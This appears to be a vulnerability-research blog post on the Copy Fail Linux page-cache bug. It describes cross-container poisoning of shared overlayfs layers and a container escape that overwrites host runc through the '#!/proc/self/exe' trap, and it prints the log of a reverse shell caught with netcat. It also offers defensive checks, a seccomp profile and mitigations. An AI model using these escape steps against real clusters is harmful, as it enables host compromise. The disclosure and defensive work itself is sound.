# Copy Fail: From Pod to Host.

> Source: <https://xint.io/blog/copy-fail-pod-to-host>
> Published: 2026-05-19 14:53:42+00:00

Two weeks ago, we disclosed [Copy Fail](https://copy.fail), a new and exceptionally dangerous Linux local-privilege escalation vulnerability.

Copy Fail exploits a kernel memory corruption flaw without injecting code into a running kernel, which makes it small and unusually portable. Copy Fail gives attackers a repeatable, controlled 4-byte write into the Linux page cache backing any readable file; in other words, it allows attackers to rewrite the cached contents of files on a Linux filesystem.

To help operators determine their susceptibility to Copy Fail, we published a proof-of-concept exploit and a model attack path. Our model attack targets the `su` binary present on most Linux systems. Because `su` is setuid root, an attacker who can rewrite it and then execute it can escalate to root. Instead of having it ask for and check a root password, the rewritten `su` skips the paperwork and drops the caller straight into a root shell.

Our proof-of-concept led some to believe that rewriting setuid binaries like `su` was the extent of the attack. Not so! The capability that Copy Fail and related page cache writing exploits extend to attackers is powerful and versatile. As an example, let’s walk through how to use it to break out of a namespaced container.

To understand this new exploit pattern, you have to understand a little bit about what’s happening under the hood in Copy Fail.

Copy Fail works by confusing the kernel code that handles IPSec ESP Extended Sequence Numbers (`authencesn`). This code is exposed to unprivileged users via `AF_ALG` sockets, which are userland’s interface to Linux’s kernel cryptography subsystem.
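As a rough way to see whether this interface is reachable from a given workload, the sketch below tries to create an `AF_ALG` socket and reports whether the kernel allowed it. It is an exposure check only: it assumes a blocked socket (for example by seccomp) surfaces as an `OSError`, and a successful open does not by itself show that the kernel is unpatched. The function name `af_alg_reachable` is ours, not part of any published tooling.

```python
import socket

# AF_ALG is address family 38 on Linux; fall back to the literal if this
# Python build does not expose the constant.
AF_ALG = getattr(socket, "AF_ALG", 38)


def af_alg_reachable():
    """Return True if this process may create an AF_ALG socket, else False."""
    try:
        sock = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
    except OSError:
        # Typical causes: a seccomp rule returning an error, a kernel built
        # without the userspace crypto API, or a non-Linux host.
        return False
    sock.close()
    return True


print("AF_ALG reachable:", af_alg_reachable())
```

Running this inside a pod before and after applying a seccomp profile is one way to confirm the profile took effect.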

Specifically, Copy Fail sets the `authencesn` code up to think it’s looking at disposable scratch memory when it’s really handling a mutable reference to the page cache. It tells the kernel’s cryptography code to decrypt a ciphertext blob, using bytes supplied by a zero-length copy from a pipe using `splice(2)`.

Because the wire format for IPSec ESNs isn’t the implicit format the crypto code operates on, the `authencesn` code shuffles sequence numbers around. But the code isn’t handling a disposable buffer from a packet; Copy Fail has tricked it into operating on a reference to a cached file.

Cross-container kernel attacks usually corrupt kernel memory: race windows, UAFs, version-bound payloads. These primitives are powerful, as they can allow code execution at the kernel level. But they’re fragile. Copy Fail is deterministic. It’s a more reliable primitive for cross-pod compromise or runtime poisoning, without relying on kernel code execution.

There are two primary attack scenarios:

**Scenario 1: cross-container poisoning.** From a compromised pod, or from a freshly launched attacker pod (only `create pods` rights required), an attacker can potentially backdoor co-located pods that access the same vulnerable lower-layer file through the same underlying `address_space`. Image references can differ; only a layer hash needs to match. The compromise lives only in the kernel page cache, so on-disk bytes are unchanged and it is invisible to agent-less disk scanners.

**Scenario 2: container escape.** From inside an unprivileged container, or from a compromised DaemonSet with host-filesystem mounts, an attacker can get a root shell on the host.

**Why the Page Cache Crosses Container Boundaries**

The page cache is shared across containers.

No matter what namespace you’re in, every `struct file` the kernel handles carries an `f_mapping` pointer, which usually comes from the underlying inode’s `i_mapping`. That means that any two file descriptors sharing an `f_mapping` share the same cache data.

The kernel’s representation of contiguous pages of memory is called a “folio”. For ordinary buffered I/O on regular files, a write through one fd updates the cached folios. Subsequent reads, on every related fd, see the updated data (subject to normal concurrency and ordering rules). Copy Fail mutates the same folios via the `AF_ALG/splice()` path described in Part 1, bypassing the regular write accounting. The visibility property is unchanged: any fd whose `f_mapping` points at the affected `address_space` reads the modified bytes on its next page cache hit.

All of this is independent of containers. Container isolation lives in mount, network, PID, user, and IPC namespaces. None of them creates a per-container `address_space` or page cache. Containers share cached folios when their file accesses reach the same underlying `address_space`.

A Kubernetes container's root filesystem is commonly an **overlayfs** mount stitched together from a writable upper layer (usually per-container scratch) and one or more read-only lower layers (image layers). Container runtimes (containerd, CRI-O, others) deduplicate layers by **content hash**: if two containers on the same node use the same unpacked layer/snapshot, the corresponding lower-layer files can be backed by the same host inode/`address_space`, regardless of what the images are named. This reuse lowers image storage requirements by sharing common layers. For example, `python:3.12-slim` and `xint-flask-app:v1` (built `FROM python:3.12-slim`) share the Python layer. Both share `debian:bookworm-slim` underneath. A `redis:7-bookworm` pod on the same node shares the Debian layer with both.
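To make the overlap concrete, here is a minimal sketch that treats each image as a flat, ordered list of layer digests and reports which layers two images have in common. The digests are hypothetical placeholders, and the one-layer-per-image model is a simplification: real images usually contribute several layers each, and runtimes key their snapshots on their own identifiers.

```python
def shared_layers(image_a, image_b):
    """Return the layer digests present in both images, in image_a's order."""
    in_b = set(image_b)
    return [digest for digest in image_a if digest in in_b]


# Hypothetical digests, shortened for readability; real ones are full sha256 values.
DEBIAN = "sha256:aaaa"
PYTHON = "sha256:bbbb"
APP = "sha256:cccc"
REDIS = "sha256:dddd"

images = {
    "python:3.12-slim": [DEBIAN, PYTHON],
    "xint-flask-app:v1": [DEBIAN, PYTHON, APP],
    "redis:7-bookworm": [DEBIAN, REDIS],
}

flask_vs_python = shared_layers(images["xint-flask-app:v1"], images["python:3.12-slim"])
redis_vs_flask = shared_layers(images["redis:7-bookworm"], images["xint-flask-app:v1"])
print(flask_vs_python)
print(redis_vs_flask)
```

Any file that lives in a digest returned by `shared_layers` is a candidate for being backed by the same host inode in both containers.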

In normal operation on an overlayfs mount, opening a lower-layer file for write access or truncation triggers overlayfs copy-up before writes proceed, allocating a new inode in the pod's upper layer so the change is private. By storing only this small set of differences, containers can reuse their lower layers efficiently while still allowing a writable copy to be presented to applications. However, Copy Fail skips the standard write path entirely. The folios it mutates belong to the lower-layer `address_space` itself, shared host-wide, rather than the upper layers that were meant to store write deltas.

The pods' overlayfs mounts each present what looks like a private `/usr/local/lib/python3.12/site-packages/foo.py` (or `/lib/x86_64-linux-gnu/libc.so.6`), but overlayfs delegates file I/O to the real lower backing file. If those backing files are the same lower inode/`address_space`, the cached folios are shared.

Copy Fail's 4-byte write goes into that one underlying entry. Anything that subsequently reads the same lower-layer file through the same underlying address_space can read the poisoned bytes, until the page is evicted or the layer is dropped.
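One way to check the "same lower inode" condition is to compare the device and inode numbers of two paths. The sketch below assumes it is run on the host against the runtime's unpacked snapshot paths, since overlayfs may report its own device and inode numbers inside a container. The demo uses a hard link in a temporary directory as a stand-in for two mounts that reach the same backing file; the file names are hypothetical.

```python
import os
import tempfile


def same_backing_file(path_a, path_b):
    """True if both paths resolve to the same (device, inode) pair."""
    a, b = os.stat(path_a), os.stat(path_b)
    return (a.st_dev, a.st_ino) == (b.st_dev, b.st_ino)


with tempfile.TemporaryDirectory() as tmp:
    original = os.path.join(tmp, "foo.py")
    with open(original, "wb") as f:
        f.write(b"print('demo')\n")

    # A hard link is a second name for the same inode, so it shares one page cache.
    alias = os.path.join(tmp, "alias.py")
    os.link(original, alias)

    # An independent copy has identical bytes but its own inode and page cache.
    copy = os.path.join(tmp, "copy.py")
    with open(copy, "wb") as f:
        f.write(b"print('demo')\n")

    linked_result = same_backing_file(original, alias)
    copied_result = same_backing_file(original, copy)

print("hard link shares inode:", linked_result)
print("copy shares inode:", copied_result)
```

Identical contents are not enough for sharing; what matters is that both opens land on the same inode.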

The on-disk inode is unchanged, so image-registry scanners, file-integrity monitors that hash on-disk contents, and offline, snapshot, or block-level scanners that bypass the running kernel's page cache all see the original content.
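That gap between cached and on-disk bytes suggests a possible check: read a file once through the page cache and once with `O_DIRECT`, then compare. The sketch below is an untested idea rather than a validated detector. It assumes the filesystem honors `O_DIRECT`, that a 4096-byte aligned buffer satisfies the device's alignment rules, and that it runs on the host against the lower-layer file. All function names are ours.

```python
import mmap
import os

BLOCK = 4096  # assumed O_DIRECT alignment; some devices need a larger block size


def read_buffered(path):
    """Ordinary read, served from the page cache when the pages are resident."""
    with open(path, "rb") as f:
        return f.read()


def read_direct(path):
    """Read with O_DIRECT so the kernel bypasses the page cache (Linux only)."""
    fd = os.open(path, os.O_RDONLY | os.O_DIRECT)
    buf = mmap.mmap(-1, BLOCK)  # anonymous mappings are page-aligned
    try:
        size = os.fstat(fd).st_size
        out = bytearray()
        # Stop at the recorded size so we never issue a read at an unaligned offset.
        while len(out) < size:
            n = os.readv(fd, [buf])
            if n == 0:
                break
            out += buf[:n]
        return bytes(out)
    finally:
        buf.close()
        os.close(fd)


def mismatched_offsets(cached, on_disk):
    """Byte offsets at which the two views of the file disagree."""
    limit = max(len(cached), len(on_disk))
    return [i for i in range(limit) if cached[i:i + 1] != on_disk[i:i + 1]]


def page_cache_diverges(path):
    """Offsets where the cached view differs from the direct-I/O view."""
    return mismatched_offsets(read_buffered(path), read_direct(path))
```

A non-empty result from `page_cache_diverges` on a read-only image layer would be worth investigating, although legitimate in-flight writes on writable files can also produce differences.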

**Scenario 1: Cross-Container Poisoning**

**Threat model.** Unprivileged attacker, no privileged capabilities, no node access, no admission rights to mutate other workloads. Two ways to start: code execution in a pod the attacker already controls (1-1), or just `create pods` rights (1-2).

**Target.** Pick a file in a layer widely shared on the node: a Python `site-packages/` module if the node hosts Python-derived workloads, a shared object such as `glibc` for broader reach (subject to executable mapping, patch alignment, and crash-safety constraints), or anything inside a Debian/Ubuntu/Alpine base layer. We will use a Python source file for this demo. Pick a module imported during interpreter startup or during a common framework's init, so target pods load it early.

**The write.** Python files are a good target for a demo because they are easier to read and more portable than shellcode. Arbitrary changes to a Python file can be made with Copy Fail by chaining 4-byte writes together. Choosing the file and its replacement contents is an important part of weaponization; we provide only a simple proof of concept here.

**The trigger.** The trigger is the next time any pod whose image includes the targeted overlayfs layer imports the target module. CPython opens the `.py` file, reads source bytes from the page cache, and compiles the patched bytes. The redirected dispatch resolves to attacker-controlled code already reachable in the image, or to a payload staged via additional Copy Fail invocations elsewhere in the layer.

**1-1: Compromised pod sharing a base layer**

The "sandbox each microservice in its own container" model assumes that code execution in any one container is bounded by that container's image and its supply chain. Shared lower-layer page cache can break that assumption: an attacker can compromise not just the pod they control, but also co-located pods that read the same targeted file from a shared lower layer. The target can be the most legitimate workload in the cluster: a metrics exporter, a log shipper, a CI runner, an unaudited debug sidecar. What matters is that it shares a base layer (`debian:bookworm-slim`, `python:3.12-slim`) with a hardened backend.

**Demo.** Pod A is the compromised pod, image `python:3.12-slim`. Pod B is an unrelated, security-hardened backend on the same node, image `payments-api:v1`, built `FROM python:3.12-slim`. The image references differ; the Python layer Pod A poisons is in Pod B's stack. Pod B's deployment imports a library that pulls in the targeted module on init.

A node-scoped disk scanner running outside both pods, hashing files via the host filesystem, sees nothing. A registry scan against the image digest sees nothing. A runtime EDR that hashes resident pages of the running `python3` after import, or that watches `execve` and child processes inside Pod B, is the best bet for detecting the compromise.

**1-2: Pod creation rights**

In this scenario, the attacker has no existing access to any pod on the cluster. They only have `create pods` rights in some namespace. This is common in multi-tenant clusters, CI runners, build agents, and shared-cluster tenancy patterns, as many CI, build, and multi-tenant service accounts are intentionally granted it.

The attack does not depend on luck about layer overlap. If the attacker can read victim pod specs, or otherwise infer the victim image and node placement, they can pull the relevant base image into the attacker pod and request scheduling on the victim's node via `nodeAffinity` or `nodeName`. Container runtime layer-hash dedup makes the attacker's overlayfs lower layer the same host inode as the victim's; the page cache write follows.

The interesting consequence is that this attack reaches across namespace and tenant boundaries that RBAC was meant to enforce. A service account with `pods/create` in its own namespace, no direct rights over the victim workload, can poison a backend in a different namespace by inheriting that backend's base image and landing on the same node.
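Because this path relies on the attacker choosing a node, one defensive angle is to flag pod manifests that pin themselves to a specific node. The sketch below is an illustrative audit helper, not a complete admission policy. It takes a pod manifest as a plain dict and checks only `spec.nodeName` and required node affinity on the hostname; the function name and the node name `worker-7` are hypothetical.

```python
HOSTNAME_KEY = "kubernetes.io/hostname"


def node_pinning(pod):
    """Return the ways a pod manifest (as a dict) pins itself to one node."""
    spec = pod.get("spec", {})
    findings = []
    if spec.get("nodeName"):
        findings.append("spec.nodeName=" + spec["nodeName"])
    required = (
        spec.get("affinity", {})
        .get("nodeAffinity", {})
        .get("requiredDuringSchedulingIgnoredDuringExecution", {})
    )
    for term in required.get("nodeSelectorTerms", []):
        for expr in term.get("matchExpressions", []):
            if expr.get("key") == HOSTNAME_KEY:
                findings.append("nodeAffinity on " + HOSTNAME_KEY)
        for field in term.get("matchFields", []):
            if field.get("key") == "metadata.name":
                findings.append("nodeAffinity on metadata.name")
    return findings


pinned_pod = {"spec": {"nodeName": "worker-7"}}
affinity_pod = {
    "spec": {
        "affinity": {
            "nodeAffinity": {
                "requiredDuringSchedulingIgnoredDuringExecution": {
                    "nodeSelectorTerms": [
                        {"matchExpressions": [
                            {"key": HOSTNAME_KEY, "operator": "In", "values": ["worker-7"]}
                        ]}
                    ]
                }
            }
        }
    }
}
print(node_pinning(pinned_pod))
print(node_pinning(affinity_pod))
```

Node pinning is common and legitimate, so a finding here is a signal to review alongside the namespace's trust level rather than proof of an attack.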

**Sub-case: compromise inside a DaemonSet.** A compromised DaemonSet is a higher-leverage exploit path. Most production DaemonSets ship with `hostPath` mounts for legitimate reasons (CNI (Container Network Interface) agents, CSI (Container Storage Interface) drivers, log forwarders, monitoring agents, security agents). The page cache shared with the host filesystem is therefore directly within the attacker's reach. With the same exploit primitive, the lateral target set now includes host-side binaries (`/usr/sbin/ipset`, `iptables`, `kubelet`-spawned helpers). Poisoning them can lead to host-root execution the next time the host invokes the affected file, provided the patch is weaponized correctly. Code execution in a DaemonSet is effectively pod-to-host without going through Scenario 2's mechanics.
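To gauge how much of this exposure exists in a cluster, an operator could inventory which workloads declare `hostPath` volumes. The following is a minimal sketch that works on a manifest already loaded as a dict; the manifest contents and the function name are hypothetical, and it does not inspect whether a mount is read-only.

```python
def host_path_mounts(workload):
    """List (volume name, host path) pairs declared by a workload manifest."""
    spec = workload.get("spec", {})
    # Controllers such as DaemonSets nest the pod spec under spec.template.spec;
    # bare pods keep it directly under spec.
    pod_spec = spec.get("template", {}).get("spec", spec)
    return [
        (vol.get("name"), vol["hostPath"].get("path"))
        for vol in pod_spec.get("volumes", [])
        if "hostPath" in vol
    ]


# Hypothetical DaemonSet manifest for illustration.
daemonset = {
    "kind": "DaemonSet",
    "spec": {
        "template": {
            "spec": {
                "volumes": [
                    {"name": "cni-bin", "hostPath": {"path": "/opt/cni/bin"}},
                    {"name": "config", "configMap": {"name": "agent-config"}},
                ]
            }
        }
    },
}
mounts = host_path_mounts(daemonset)
print(mounts)
```

Workloads that appear in this inventory are the ones where a compromise puts host files directly in range of a page cache write.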

**Scenario 2: Container Escape**

**Threat model.** Same starting position: an unprivileged container with code execution and no privileged capabilities. The goal is now a shell on the host.

**The shared inode.** When `runc` patched [CVE-2019-5736](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/), the original fix copied the `runc` binary to a memfd before each `execve` so it could not be overwritten from inside the container. A [follow-up commit](https://github.com/opencontainers/runc/commit/16612d74de5f84977e50a9c8ead7f0e9e13b8628) replaced the copy with a read-only bind mount of the host's `runc` into every container, to take advantage of kernel page cache sharing across the spawn fan-out. Of course, the kernel page cache is the very thing that we are overwriting, which means that design can again expose the host `runc` mapping to a page-cache write primitive.

**The chain.** Same shape as Datadog's [Dirty Pipe container-escape PoC](https://www.datadoghq.com/blog/engineering/dirty-pipe-container-escape-poc/), with Copy Fail as the write primitive instead of Dirty Pipe.

**Step 1: Force `runc` to run.**

When a user execs into the container (for example with `kubectl exec`), kubelet implements it via `runc exec` into the already-running container, which is the window we need. Container starts, restarts, and init steps don't work: they run on a fresh filesystem, before the entrypoint has planted the trap.

To make the wait deterministic, Datadog's PoC plants the trap by overwriting `/bin/sh` in the container with `#!/proc/self/exe`, so the next time anyone (or anything) execs a shell inside, `runc` is invoked. When `runc` execs that shell, the kernel resolves the shebang and re-execs `/proc/self/exe`, which still points to `runc` mid-exec. That leaves a `runc` process pinned in the container's PID namespace, alive long enough for Step 2.
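The shebang trap leaves a recognizable marker, which a runtime agent could look for. The sketch below is a detection heuristic of our own, not something taken from Datadog's PoC: it checks whether a file begins with the bytes `#!/proc/self/exe`. The demo writes two throwaway files in a temporary directory rather than touching a real shell.

```python
import os
import tempfile

TRAP = b"#!/proc/self/exe"


def is_self_exe_trap(path):
    """True if the file begins with a shebang that re-executes the caller."""
    try:
        with open(path, "rb") as f:
            return f.read(len(TRAP)) == TRAP
    except OSError:
        # Missing or unreadable files are treated as "not a trap" in this sketch.
        return False


with tempfile.TemporaryDirectory() as tmp:
    trapped = os.path.join(tmp, "sh")
    with open(trapped, "wb") as f:
        f.write(b"#!/proc/self/exe\n")

    normal = os.path.join(tmp, "true")
    with open(normal, "wb") as f:
        f.write(b"\x7fELF")  # first bytes of an ordinary ELF binary

    trap_found = is_self_exe_trap(trapped)
    normal_flagged = is_self_exe_trap(normal)

print("trap detected:", trap_found)
print("normal binary flagged:", normal_flagged)
```

In practice such a check would be pointed at the shells and interpreters inside a container's root filesystem, for example `/bin/sh`.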

**Step 2: Locate the runc PID.** Once `runc` appears in the container's PID namespace, scan `/proc` for the process whose `/proc/<pid>/exe` symlink resolves through the bind mount to the host `runc` inode.

**Step 3: Poison via `/proc/<runc_pid>/exe`.** Open that fd. Run Copy Fail against it; the page cache write lands in the first page backing `runc`, replacing its ELF header and the rest of the binary with a small malicious ELF. The cached pages are now poisoned and staged for the next invocation.

**Step 4: Wait for the next `runc`.** Any subsequent `runc` invocation on the host maps the cached pages and executes the modified code as root. This includes `kubectl exec` from an admin, the next pod start, the next probe, and so on. Attackers can often force this to happen by terminating the pod, forcing a restart.

This exploit path follows that of Dirty Pipe very closely. However, Copy Fail covers every kernel from the 2017 in-place commit ([72548b093ee3](https://github.com/torvalds/linux/commit/72548b093ee3)) through the 2026 fix ([a664bf3d603d](https://github.com/torvalds/linux/commit/a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5)).

**PoC.** A reverse shell from host context, captured on the listener:

```bash
ubuntu@ip-172-26-6-67:~$ nc -l 1234 -v
Listening on 0.0.0.0 1234
Connection received on ec2-43-202-13-255.ap-northeast-2.compute.amazonaws.com 52450
[cwd] /run/containerd/io.containerd.runtime.v2.task/k8s.io/880c5f77aa39359e231f5ea709148f7914584c9986f8636b1201430f842e94c2
[listdir: cwd]
.
..
init.pid
log.json
runtime
options.json
bootstrap.json
shim-binary-path
log
config.json
work
rootfs
[listdir: /]
.bottlerocket
bin
boot
dev
etc
...
x86_64-bottlerocket-linux-gnu
```

Two things to read off this output. The connecting peer is `ec2-43-202-13-255.ap-northeast-2.compute.amazonaws.com`, an AWS public DNS name in `ap-northeast-2`, an EKS worker EC2 instance. The shell's working directory is `/run/containerd/io.containerd.runtime.v2.task/k8s.io/880c5f77aa3.../`, the **containerd shim's per-container runtime state directory on the host**. That path does not exist inside any pod's mount namespace; only the host (or a container with the runtime state explicitly mounted) can `chdir` into it. The shell is on the node, not in a container.

**Detection and Mitigation**

What does and doesn't catch this:

| Control | Catches it? |
| --- | --- |
| Image registry scanning (Trivy, Clair, similar) | No. Image bytes unchanged. |
| Agent-less disk scanning (sensor-less node scans, snapshot-based scanners) | No. On-disk file unchanged. |
| File-integrity monitoring on disk (AIDE, Tripwire) | No. On-disk hash unchanged. |
| Runtime EDR hashing in-memory pages of running processes | Yes, in principle. |
| Runtime EDR monitoring | Partial. Catches post-exec behavior, not the page cache write. |
| Seccomp profile blocking `AF_ALG` | Yes. Removes the primitive. |
| gVisor | Yes. Separate user-space kernel, no shared host page cache. |
| Kata Containers | Yes. Per-pod VM, separate kernel, separate page cache. |
| Managed per-pod microVM (EKS Fargate; equivalents on other clouds) | Yes, by the same mechanism as Kata. Each pod runs in its own microVM with its own kernel and page cache. |
| Patched host kernel | Yes. Root cause fixed. |

For mitigating this and future issues:

**Patch the host kernel.** Pull the fix ([a664bf3d603d](https://github.com/torvalds/linux/commit/a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5)) through your managed platform's node-image update or via in-place node-OS patching. This is the best way to fix the Copy Fail bug.

**Block AF_ALG.** A pod seccomp profile that denies `socket(AF_ALG, ...)` removes the primitive used in Copy Fail. Most production workloads do not need AF_ALG, but validate this against cryptographic or VPN/storage workloads before enforcing globally. Blocking it also reduces attack surface against a kernel component that has had several issues besides Copy Fail.

**Use VMs or similar for tenant boundaries.** Workloads that need hard isolation should never rely on containers as a security boundary. Migrating to VMs, microVMs, or systems like gVisor greatly reduces attack surface for guest-to-host attacks.
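As an illustration of the AF_ALG mitigation, the sketch below generates a seccomp profile in the JSON format used by container runtimes, with a single rule that makes `socket()` fail when its first argument is `AF_ALG` (38 on Linux). It is deliberately minimal and default-allow for readability. In practice you would more likely add this rule to your runtime's default profile, and the sketch does not cover the legacy `socketcall` multiplexer used by some 32-bit ABIs. The function name is ours.

```python
import json

AF_ALG = 38  # address-family number for AF_ALG on Linux


def deny_af_alg_profile():
    """Build a seccomp profile dict that rejects socket(AF_ALG, ...)."""
    return {
        # Assumption for brevity: allow everything else. A hardened profile
        # would start from the runtime default instead.
        "defaultAction": "SCMP_ACT_ALLOW",
        "syscalls": [
            {
                "names": ["socket"],
                "action": "SCMP_ACT_ERRNO",
                # Match only when argument 0 (the address family) equals AF_ALG.
                "args": [{"index": 0, "value": AF_ALG, "op": "SCMP_CMP_EQ"}],
            }
        ],
    }


profile_json = json.dumps(deny_af_alg_profile(), indent=2)
print(profile_json)
```

The resulting JSON can be saved on each node and referenced from a pod's `securityContext.seccompProfile` as a `Localhost` profile.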

Agent-less disk scanners are unlikely to catch this compromise because the affected bytes live only in the running kernel's page cache.